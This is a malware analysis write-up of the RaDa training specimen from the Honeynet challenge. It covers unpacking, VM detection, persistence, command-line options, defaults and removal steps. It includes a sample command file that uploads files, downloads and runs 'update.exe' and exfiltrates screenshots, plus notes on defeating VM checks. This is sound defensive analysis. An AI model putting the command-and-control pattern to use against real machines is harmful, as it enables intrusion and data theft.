Honeynet Scan of the Month 32 Analysis

Author: Chris Eagle, cseagle at nps d0t edu

Answers to the challenge questions can be found here

Analyzing RaDa.zip, for Scan of the Month 32

The Honeynet Scan of the Month Challenge for September 2004 invited participants to analyze a malware specimen distributed for the challenge as RaDa.zip (named after the program's authors Raul and David). The only information given in the challenge statement was:

"All we are going to tell you about the binary is that it was created to increase the security awareness around malware specimens and to point out the need of additional defensive countermeasures in order to fight current malware threats."

Background: My preferred method of approaching a malware analysis is to do some preliminary investigation of the binary using simple tools such as file and strings to develop an idea of what to expect and then move into a purely passive analysis phase. My malware analysis platform of choice is a Windows workstation with IdaPro and cygwin utilities installed.

Obtaining the binary: The file RaDa.zip was downloaded from the Honeynet site and its integrity verified using both the md5sum and sha1sum tools available with cygwin. The file utility verified that RaDa.zip was indeed a zip file:
$ file RaDa.zip
RaDa.zip: Zip archive data, at least v2.0 to extract
and the single file contained within, RaDa.exe was extracted. The file utility was used again to categorize RaDa.exe as:
$ file RaDa.exe
RaDa.exe: MS-DOS executable (EXE), OS/2 or MS Windows
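The integrity check mentioned above was done with md5sum and sha1sum. For readers without cygwin, the same check can be sketched in Python. This is only an illustration: the function names are mine, and the expected digests would have to come from the challenge page (they are not reproduced here).

```python
import hashlib


def file_chunks(path, chunk_size=65536):
    """Yield the contents of the file at `path` in fixed-size chunks."""
    with open(path, "rb") as handle:
        while True:
            chunk = handle.read(chunk_size)
            if not chunk:
                break
            yield chunk


def digests(chunks):
    """Return (md5_hex, sha1_hex) computed over an iterable of byte chunks."""
    md5 = hashlib.md5()
    sha1 = hashlib.sha1()
    for chunk in chunks:
        md5.update(chunk)
        sha1.update(chunk)
    return md5.hexdigest(), sha1.hexdigest()


def matches_published(chunks, expected_md5, expected_sha1):
    """Compare computed digests with published ones, ignoring hex case."""
    md5_hex, sha1_hex = digests(chunks)
    return md5_hex == expected_md5.lower() and sha1_hex == expected_sha1.lower()
```

A call such as digests(file_chunks("RaDa.zip")) would then produce the two values to compare against the published ones.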
Preliminary analysis: Following confirmation that the malware file was a Windows executable, the strings utility was used to see if it could uncover anything interesting. With any Windows binary, it is always a good idea to scan for both 7-bit ASCII and 16 bit Unicode strings. The following ASCII strings were found (edited to show only initially interesting strings):
$ strings -a RaDa.exe
!This program is the binary of SotM 32..
KERNEL32.DLL
MSVBVM60.DLL
LoadLibraryA
GetProcAddress
ExitProcess
And, the following Unicode strings (note the use of the "-e l" option to search for 16 bit character strings, "man strings" for more info) were found:
$ strings -e l RaDa.exe
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Malware
ProductName
RaDa
FileVersion
1.00
ProductVersion
1.00
InternalName
RaDa
OriginalFilename
RaDa
VarFileInfo
Translation
The most interesting fact learned from all of this is that the binary was probably written in Visual Basic, based on its use of MSVBVM60.DLL (rather than MSVCRT.DLL, the standard C library). ProcessLibrary.com describes MSVBVM60.DLL as follows: "msvbvm60.dll is a module for the Microsoft Visual Basic virtual machine". An additional thing to note here is that binaries that yield so few strings often turn out to be protected by some form of obfuscator such as ASPack or UPX. This knowledge helps us know what to expect when we take a closer look.
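The two strings passes used above (7-bit ASCII and 16-bit little-endian Unicode) can be approximated with a pair of regular expressions. This is a rough sketch rather than a reimplementation of the strings utility: the function names and the minimum length of 4 are my own choices, and only printable characters in the range 0x20 to 0x7E are considered.

```python
import re


def ascii_strings(data, min_len=4):
    """Find runs of at least `min_len` printable 7-bit ASCII characters."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def utf16le_strings(data, min_len=4):
    """Find runs of printable characters stored as 16-bit little-endian
    code units, i.e. each ASCII byte followed by a zero byte."""
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16-le") for m in pattern.finditer(data)]
```

Running both functions over the raw bytes of a binary gives output comparable to "strings -a" and "strings -e l" respectively. A packed binary will return very few results from either, which is the symptom noted above.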

A More Detailed Look: The next thing I always do with a malware specimen is load it up in IdaPro. I am generally interested in answering the following questions:
I am interested in these questions just in case I decide to actually run the program as part of testing it. Running the program is something I try to avoid entirely as an analysis technique. I generally only run malware samples once I know what to expect of them and when I can be sure that I can control them. In any case, if I do run them, they are always run on an isolated network.

When the file was loaded into IdaPro, Ida displayed a warning message (seen to the right) that the import table was located in a non-standard section and recommended reloading the binary in manual mode, which I did. Ida was able to disassemble only a single function, "start", at the entry point of the program. The fact that Ida was able to recognize so little code was also an indication that the binary had been obfuscated in some way. Based on personal experience, I immediately recognized the protection algorithm as that employed by the Ultimate Packer for eXecutables (UPX). It was also clear that the binary had been further obfuscated to remove some of the telltale signs of UPX packing: the section names had been altered from UPX to JDR (the first initials of the first names of the authors of this month's scan), and the characteristic UPX packing notice placed at the beginning of each UPX-compressed file had been overwritten with the following string:
!This program is the binary of SotM 32..
As a consequence of these actions, the original, uncompressed binary could not be recovered using UPX itself. While UPX is capable of compressing a binary, it is also capable of decompressing a UPX-compressed binary in order to recover the original, uncompressed binary. This is done with the "-d" command line option to UPX. Unfortunately, if UPX detects that a binary has been tampered with, it will refuse to decompress the binary. In order to work with UPX-protected binaries within IdaPro, I had previously developed an IDC script specifically to unpack UPX binaries. The script mimics the UPX decompression routine and reconstructs the program's import table in a manner similar to UPX itself. A useful thing to do following execution of the decompression script is to have Ida rescan the binary for strings. If the decompression was successful, a fair number of new strings should be detectable. Because Ida has grouped data in ways that it prefers, it is useful to have Ida "Ignore defined instructions and data" (see the figure to the right) when scanning for new strings. Also, since this is a Windows binary, it is useful to scan for Unicode strings in addition to standard C strings. Some results of the new strings scan appear in the figure below:

Tracing execution of the program following decompression is simply a matter of noting where the UPX decompression stub transfers control once it is finished. In this case we find the following instructions at the end of the decompression routine:
JDR1:0040FE77 loc_40FE77:                            ; CODE XREF: JDR1:0040FE30
JDR1:0040FE77 popa
JDR1:0040FE78 jmp near ptr dword_4018A4
So analysis continued at the instruction at location 0x04018A4 which unfortunately does not lead very far:
JDR0:0040189C j_Ordinal_0x64 proc near               ; CODE XREF: JDR0:004018A9
JDR0:0040189C jmp ds:Ordinal_0x64
JDR0:0040189C j_Ordinal_0x64 endp
JDR0:0040189C
JDR0:0040189C ; ---------------------------------------------------------------------------
JDR0:004018A2 align 4
JDR0:004018A4
JDR0:004018A4 loc_4018A4: ; CODE XREF: JDR1:0040FE78
JDR0:004018A4 push offset dword_401994
JDR0:004018A9 call j_Ordinal_0x64
Here we see that the program immediately pushes a value and then calls an imported library function. The key to continued execution must therefore lie in the data that is pushed, so examination continued at location 0x0401994. As seen in the following figure, this location begins with a VB5 marker indicating a Visual Basic 5 compatible data structure. Location 0x0401994 is clearly not executable, so perhaps this data structure contains a pointer to the main function of the malware program. Following a little data reorganization, some values stand out for potential exploration. The values contained in locations 004019C0, 004019C4, 004019E0, and 004019E4 all fall within the range of the JDR0 section of the program and may therefore point to executable portions of the program. As seen in the figure below, IdaPro displays the contents of the target locations whenever the mouse cursor is held over an address. In the case of address 4045D0h, it is clear (with a little reverse engineering experience) that a function prologue is present at that address, while no function prologues appear to be present at the other 3 pointer locations. As a side note, it is a useful reverse engineering skill to remember what the machine language representation of a function prologue looks like in order to be able to recognize function boundaries while looking at raw hex.
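The pointer triage described above (keep only values that fall inside the code section, then look for a function prologue at each target) can be sketched as follows. This is an illustration under assumptions: it works on a flat memory image in which offset = address - image base, and the section bounds are supplied by the caller. The function names are hypothetical.

```python
# x86 encodings of "push ebp ; mov ebp, esp". 55 8B EC is the form most often
# seen in Microsoft-compiled code; 55 89 E5 is an equivalent alternate encoding.
PROLOGUES = (bytes.fromhex("558bec"), bytes.fromhex("5589e5"))


def has_prologue(image, image_base, address):
    """Return True if a standard frame-pointer prologue starts at `address`."""
    offset = address - image_base
    if offset < 0:
        return False
    return bytes(image[offset:offset + 3]) in PROLOGUES


def candidate_functions(image, image_base, pointers, section_start, section_size):
    """Filter `pointers` down to those that lie inside the given section and
    whose target bytes look like the start of a function."""
    section_end = section_start + section_size
    return [
        p for p in pointers
        if section_start <= p < section_end and has_prologue(image, image_base, p)
    ]
```

Functions that do not set up a frame pointer will be missed by this test, so a negative result only means that the obvious prologue is absent.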

Transferring attention to program location 4045D0h and asking Ida to change the displayed data into first code, then a function yields the results in the following figure. I elected to rename the function VB_Main and considered this the true entry point to the program. While Ida was able to recognize calls to library functions (because the import table had been reconstructed), it was not able to recognize calls to functions that had not been properly analyzed yet.

The following lines show a case in which Ida does not yet know a function exists at the target of a call instruction:
JDR0:00404879
JDR0:00404879 loc_404879: ; CODE XREF: VB_Main+2A1
JDR0:00404879 call near ptr dword_404F40+70h
By asking Ida to convert the values around location 404F40h into code, a new function is discovered and the call instruction is transformed into the following:
JDR0:00404879 loc_404879:                        ; CODE XREF: VB_Main+2A1
JDR0:00404879 call sub_404FB0
sub_404FB0 appears in the following figure and the string reference begins to give us the sense that we are on the right track:


By analyzing each newly discovered function for similar unresolved call instructions additional functions are located until the start of every function contained in the file has been found and properly reformatted into a disassembled function listing.  The final version of the IdaPro database file generated for this analysis can be found here (IDA 4.70 database format).

Behavioral Analysis: Once all of the functions within the program have been found, the behavior of each needs to be understood. The most interesting function initially is the one mentioned above, sub_404FB0. This function stands out because of its references to many interesting strings, including the following:
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\"
which is the name of a Windows registry key often used by malware to ensure that the malware is restarted each time a computer is rebooted. All programs listed under this key are started by Windows at system startup. Analysis of function sub_404FB0 shows that it largely performs initialization tasks for a number of string variables. For this reason I renamed the function Init_data. Another interesting string that gets referenced from this function is:
"HKLM\Software\VMware, Inc.\VMware Tools\InstallPath"
which is a key used by VMWare to indicate the install location for "VMWare Tools" within virtual machines running Windows as the guest operating system. IdaPro's cross-referencing features indicate every location from which a program variable is referenced. By making use of cross-referencing, the functions that refer to the two registry keys mentioned above are quickly located for analysis.

In the case of the "Run" key, a function is found that performs a registry write to add RaDa.exe (or whatever it has been renamed to) to the list of programs run at system startup. In the case of the "VMWare Tools" key, a function is found in which the malware tests for the presence of this key. From this it is inferred that the malware is actively looking to see if it is running within a virtual machine. Further analysis of the same function reveals that the malware makes use of the Windows WMI interface to iterate through each network interface and test whether the MAC address of the interface is one which belongs to VMWare as assigned by the IEEE and published in its list of "Organizationally Unique Identifiers (OUI)/company Ids" (http://standards.ieee.org/regauth/oui/oui.txt). I dubbed this function "check_for_vmware".
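The MAC address test performed by check_for_vmware amounts to comparing the first three bytes of each adapter address (the OUI) against a list of vendor prefixes. A minimal sketch of that comparison is shown below. The prefixes listed are OUIs commonly associated with VMware in the IEEE registry; exactly which prefixes RaDa itself checks is not stated in this writeup, so treat the set as an assumption. The function names are mine.

```python
# Assumed list of VMware OUIs (first three bytes of the MAC address).
VMWARE_OUIS = {"000569", "000C29", "005056"}


def mac_oui(mac):
    """Return the OUI of a MAC address as six upper-case hex digits.
    Accepts ':', '-' or '.' as separators."""
    digits = mac.replace(":", "").replace("-", "").replace(".", "").upper()
    if len(digits) != 12 or any(c not in "0123456789ABCDEF" for c in digits):
        raise ValueError(f"not a MAC address: {mac!r}")
    return digits[:6]


def is_vmware_mac(mac):
    """Return True if the address carries one of the assumed VMware OUIs."""
    return mac_oui(mac) in VMWARE_OUIS
```

This also shows why changing the MAC address of the virtual adapter is enough to defeat this particular check.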

Each function called by Init_data was examined in turn. One of the more revealing functions contained a large program loop that tested for a number of strings that each started with "--". This function was dubbed parseArgs as it appeared to be a command line argument parser. The following is a table of command line arguments accepted by the program and their purpose.

Argument | Description
--- | ---
--visible | Causes the Internet Explorer window to be displayed during command fetch operations.
--verbose | Does nothing other than initialize the string "Starting DDoS Smurf remote attack..."; there is no evidence, however, that the binary actually performs a Smurf attack.
--server <url base> | Specifies the base URL of the remote command server, which must be on a private subnet and must be referred to by IP address rather than hostname. default: http://10.10.10.10/RaDa
--commands <file name> | Specifies the name of the remote command file to retrieve. default: RaDa_commands.html
--cgipath <path> | Specifies the name of the remote cgi directory. default: cgi-bin
--cgiget <name> | Specifies the name of the remote cgi script to invoke for downloading files to the infected victim. default: download.cgi
--cgiput <name> | Specifies the name of the remote cgi script to invoke for uploading files off of the infected victim. default: upload.cgi
--tmpdir <dir> | Specifies the name of the working directory to be used by the running program instance. default: C:\RaDa\tmp
--period <time> | Specifies the number of seconds the program waits between successive command cycles. default: 60
--cycles <num> | Specifies the number of command cycles the program should complete before exiting. default: 0 (0 == infinite)
--help | Causes the program to display a copyright notice in an Internet Explorer window.
--gui | Causes the program to display a gui control panel.
--installdir <dir> | Specifies the directory in which the program will install itself. default: C:\RaDa\bin
--noinstall | Specifies that the program should not install itself permanently (do not copy exe or add registry key). The default is to install.
--uninstall | Specifies that the program should uninstall itself by deleting its exe and removing its registry key.
--authors | Causes the program to open a dialog box listing the authors of the program. The dialog box will only be displayed if the check_for_vmware function indicates that the program is not running in a virtual machine.

Any other command line arguments cause the program to display the --help message and quit.
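To make the behavior of parseArgs concrete, the following sketch mimics it in Python. The option names and defaults come from the table above. The parsing details are my assumptions and not a transcription of the disassembly: in particular, treating a missing or non-numeric value as an unrecognized argument is a guess.

```python
# Options that take a value, with the defaults listed in the table.
VALUE_OPTIONS = {
    "server": "http://10.10.10.10/RaDa",
    "commands": "RaDa_commands.html",
    "cgipath": "cgi-bin",
    "cgiget": "download.cgi",
    "cgiput": "upload.cgi",
    "tmpdir": r"C:\RaDa\tmp",
    "period": 60,
    "cycles": 0,
    "installdir": r"C:\RaDa\bin",
}
# Options that act as simple on/off flags.
FLAG_OPTIONS = ("visible", "verbose", "help", "gui",
                "noinstall", "uninstall", "authors")
NUMERIC_OPTIONS = ("period", "cycles")


def parse_args(argv):
    """Return a configuration dict built from a list of arguments.
    Anything unrecognized sets the 'help' flag and stops parsing."""
    config = dict(VALUE_OPTIONS)
    config.update((flag, False) for flag in FLAG_OPTIONS)
    args = iter(argv)
    for arg in args:
        name = arg[2:] if arg.startswith("--") else None
        if name in FLAG_OPTIONS:
            config[name] = True
        elif name in VALUE_OPTIONS:
            value = next(args, None)
            # Assumption: a missing or malformed value is treated like
            # an unknown argument.
            if value is None or (name in NUMERIC_OPTIONS and not value.isdigit()):
                config["help"] = True
                break
            config[name] = int(value) if name in NUMERIC_OPTIONS else value
        else:
            config["help"] = True
            break
    return config
```

For example, parse_args(["--noinstall", "--server", "http://192.168.0.202"]) leaves every other setting at its default.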

Once program data has been initialized by the Init_data function, control returns to VB_Main, which immediately calls a function I named "command_loop". If --uninstall was specified, command_loop removes the program and terminates. If --noinstall was NOT specified, then command_loop installs the program. Control then passes to a loop that executes the number of times specified by the --cycles argument. Each pass through the loop invokes a call to a function I named "execute" and then causes the program to sleep in accordance with the --period argument.
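The control flow just described can be summarized in a few lines. This is a sketch of my reading of command_loop, not a decompilation. The install, uninstall and execute steps are passed in as callables so that the skeleton stays self-contained, and the dictionary keys are hypothetical names for the corresponding command line settings.

```python
import itertools
import time


def command_loop(config, execute, install, uninstall, sleep=time.sleep):
    """Run the install/uninstall logic followed by the command cycles.
    Returns the number of completed cycles."""
    if config["uninstall"]:
        uninstall()
        return 0
    if not config["noinstall"]:
        install()
    # A cycle count of 0 means "loop forever".
    if config["cycles"] == 0:
        passes = itertools.count()
    else:
        passes = range(config["cycles"])
    completed = 0
    for _ in passes:
        execute(config)
        sleep(config["period"])
        completed += 1
    return completed
```

Passing a stub for sleep makes it possible to exercise the loop without actually waiting between cycles.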

The execute function lies at the heart of this program. Analysis of the execute function reveals what the program is actually capable of. The function begins with a series of tests to ensure that the remote command server lies on a private subnet. The function then invokes an Internet Explorer Application object to download the remote command file whose URL is specified by <server>/<commands>. If the --visible flag was set, then the command file will be displayed in an Internet Explorer window. Once the file has been retrieved, the function iterates through a list of form elements contained within the html document. The name of each form element is tested to see if it represents a valid command to the program. The program recognizes the following commands:

Command | Argument | Description
--- | --- | ---
exe | <cmd> | run the specified command using "%COMSPEC% /C <cmd>"
get | <filename> | invoke <server>/<cgipath>/<cgiget> to download <filename> from <server> to the victim's <tmpdir>
put | <filename> | invoke <server>/<cgipath>/<cgiput> to upload <filename> from the victim to <server>
screenshot | <filename> | saves a bmp image of the victim's screen into the named file in <tmpdir>
sleep | <duration> | causes the program to sleep for the specified time. This is in addition to the delay introduced by the --period option
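The private-subnet restriction and the URL layout used by execute can be illustrated with the short sketch below. It assumes that "private subnet" means the three RFC 1918 ranges, which is my interpretation; the exact tests the binary performs are not reproduced here. Only the script URLs are built, since the request parameters sent to the cgi scripts are not covered in this writeup. The function names are mine.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumption: "private" means the RFC 1918 address ranges.
PRIVATE_NETS = [ipaddress.ip_network(n)
                for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def server_is_private(server_url):
    """True only if the URL names its host by IP and the IP is private."""
    host = urlsplit(server_url).hostname
    if host is None:
        return False
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname rather than an IP address
    return any(address in net for net in PRIVATE_NETS)


def command_file_url(server, commands):
    """Build <server>/<commands>."""
    return server.rstrip("/") + "/" + commands


def cgi_url(server, cgipath, script):
    """Build <server>/<cgipath>/<cgiget or cgiput>."""
    return "/".join((server.rstrip("/"), cgipath.strip("/"), script))
```

With the default settings, command_file_url yields http://10.10.10.10/RaDa/RaDa_commands.html and cgi_url yields http://10.10.10.10/RaDa/cgi-bin/download.cgi for downloads.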

Each of the commands above requires a single parameter that is taken from the value field of the form element used to specify the command. An example command file is shown below:
The commands above instruct the program to:
  1. dump a directory listing into a file named dir.txt
  2. upload dir.txt to <server>
  3. delete the directory listing file
  4. download a file named "update.exe" from <server>
  5. execute the newly downloaded file "update.exe"
  6. capture a screen shot of the victim computer
  7. upload the screen shot to <server>
  8. delete the screen shot from the victim computer
If the command file that resides on <server> is updated during the period between cycles, then the program can be made to execute a new command set in the following execution cycle.
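The way execute walks the form elements of the command file can be sketched with Python's standard HTML parser. The sample document below is hypothetical: it is written to match the eight steps listed above and is not the file used in my testing. The use of input elements, the file names and the simplified paths are all assumptions. Only the name/value convention and the five command names come from the analysis.

```python
from html.parser import HTMLParser

VALID_COMMANDS = {"exe", "get", "put", "screenshot", "sleep"}


class CommandFileParser(HTMLParser):
    """Collect (command, argument) pairs from form input elements."""

    def __init__(self):
        super().__init__()
        self.commands = []

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        fields = dict(attrs)
        name, value = fields.get("name"), fields.get("value")
        # Elements whose name is not a known command are ignored.
        if name in VALID_COMMANDS and value is not None:
            self.commands.append((name, value))


def parse_command_file(html_text):
    parser = CommandFileParser()
    parser.feed(html_text)
    parser.close()
    return parser.commands


# Hypothetical command file matching the eight steps described above.
SAMPLE = """<html><body><form>
<input type="text" name="exe" value="dir &gt; dir.txt">
<input type="text" name="put" value="dir.txt">
<input type="text" name="exe" value="del dir.txt">
<input type="text" name="get" value="update.exe">
<input type="text" name="exe" value="update.exe">
<input type="text" name="screenshot" value="screen.bmp">
<input type="text" name="put" value="screen.bmp">
<input type="text" name="exe" value="del screen.bmp">
<input type="submit" name="go" value="ignored">
</form></body></html>"""
```

Calling parse_command_file(SAMPLE) returns the eight commands in document order, which is the order in which they would be carried out during a cycle.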

Additional analysis of the program indicates that the file upload portion of the code was lifted from this example: http://www.motobit.com/tips/detpg_uploadvbsie.htm. This was discovered by conducting an internet search for the following piece of text found in the program:
"Copyright (C) 2001 Antonin Foller, PSTRUH Software"
The discovery of this script made reverse engineering several functions much easier.

Behavioral Observation: Sufficient static analysis was performed to develop a good idea of the expected behavior of the program. In order to confirm my findings, the program was allowed to run in an instrumented lab environment. A web server was configured to accept requests from the program and all of the command line options noted previously were exercised. Because of the VMWare checks performed by the program, I elected to run it on a laptop running Windows 2000 rather than within a virtual machine. It should be noted however that all of the VMWare checks performed by the program can be defeated with the following steps:
  1. Uninstall VMWare Tools if they are installed in your VM
  2. Change the MAC address of the virtual adapter in your guest operating system. Steps for how to do this were posted to the Honeypots mailing list here: http://www.securityfocus.com/archive/119/361359/2004-04-20/2004-04-26/2
With those changes made, the program will happily tell you who its authors are even when running within a virtual machine.

Programs used to instrument test runs of RaDa include the following:
The following test runs were performed, with any graphical output displayed to the right of the command used to generate it:
RaDa --noinstall --help
RaDa --noinstall --gui
RaDa --noinstall --authors
RaDa --noinstall --server http://192.168.0.202
Ethereal was used to capture network traffic and several different HTTP connections were observed:
  1. Request for RaDa_commands.html - the commands in this file are then executed resulting in two additional HTTP requests
  2. Request to download file "update.exe"
  3. Request to upload file "dir.txt"
RaDa --server http://192.168.0.202
The purpose of  the command above was to observe the installation process of the program. Regmon and Filemon were used to monitor registry and file system activity respectively and Regshot was used to perform a before and after snapshot comparison of the registry.  The amount of data gathered by Regmon and Filemon can be overwhelming.  Both utilities offer some filtering capability, but I find it easier to save the data from each program to text files that I can search easily.  Regshot is an excellent tool to assist in data reduction as it focuses strictly on changes to the registry.
  1. Relevant Regmon data showing the addition of a "Run" key value to launch RaDa on startup.  Useful things to key on are "CreateKey" and "SetValue" events.
  2. Relevant Filemon data showing first the creation of the install directories and second the copying of RaDa.exe from its original location to the specified install location. Useful things to key on are "CREATE" and "WRITE" events.
  3. A RegShot comparison detailing the changes made to the registry following execution of RaDa.  Note the first item under "Values added".
RaDa --uninstall
Similar instrumentation was performed during the uninstall process.  It was observed that while the program does delete itself from its installed location, and it does remove the registry value used to launch the program on system startup, it does not remove the directory hierarchy created to support the program.
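The before-and-after comparison that Regshot performs is conceptually a diff of two snapshots. The idea can be shown with plain dictionaries that map a value path to its data. This is an illustration of the technique only, not of Regshot's file format, and the value name used in the usage note is hypothetical.

```python
def diff_snapshots(before, after):
    """Compare two {path: data} snapshots and report what changed."""
    added = {k: after[k] for k in after.keys() - before.keys()}
    removed = {k: before[k] for k in before.keys() - after.keys()}
    changed = {
        k: (before[k], after[k])
        for k in before.keys() & after.keys()
        if before[k] != after[k]
    }
    return {"added": added, "removed": removed, "changed": changed}
```

Taking one snapshot before installation and one after, the "added" entry would be expected to contain a value under HKLM\Software\Microsoft\Windows\CurrentVersion\Run pointing at the installed copy of RaDa.exe. Repeating the comparison across an uninstall should show the same value under "removed".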

Indications that RaDa may be present or running on a system:

The following items are indications that RaDa may be present on a system:
  1. RaDa.exe observed in Task Manager
  2. Unexplained instances of IEXPLORE.exe observed in Task Manager
  3. The presence of the directory: C:\RaDa
  4. The presence of a registry value under the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run that points to RaDa.exe
  5. Periodic uncommanded HTTP requests observed for file "RaDa_commands.html"
Cleaning RaDa from a system:
  1. Locate and delete the RaDa binary which by default will reside in C:\RaDa\bin.
  2. Using regedit, navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and delete the value that points to the RaDa binary.
  3. Kill the RaDa process using Task Manager. You may also need to kill an IEXPLORE process. Make sure all visible instances of Internet Explorer are closed, then kill any IEXPLORE processes that remain listed in Task Manager.

References: